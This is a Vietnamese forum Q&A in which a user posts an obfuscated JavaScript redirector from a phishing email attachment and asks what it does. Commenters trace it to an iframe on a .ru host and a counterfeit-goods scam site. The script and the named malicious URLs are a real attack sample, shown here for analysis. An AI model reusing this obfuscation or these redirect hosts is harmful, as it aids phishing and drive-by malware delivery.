Một vài đồng nghiệp không phải CNTT của tôi đã mở tệp đính kèm .html trong một email có vẻ cực kỳ đáng ngờ. Nó dẫn đến một màn hình trống khi nó xuất hiện một số mã javascript đã được chạy.Mã lừa đảo đáng ngờ này làm gì?
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
Nó đã làm gì? Nó nằm ngoài phạm vi kiến thức lập trình của tôi.
Tôi không đề nghị bất kỳ ai nhấp vào liên kết này. Trang đó tải một khung nội tuyến từ http://onionfleet.ru:8080/index.php?pid=10 và chuyển hướng đến http://mouselong.com. cũng ** không nhấp vào các liên kết trong nhận xét này ** trừ khi bạn biết mình đang làm gì. – x1a4
mà lần lượt chứa một khung nội tuyến liên kết đến một số trang web lừa đảo bán * không quá xác thực * đồng hồ rõ ràng ... – nico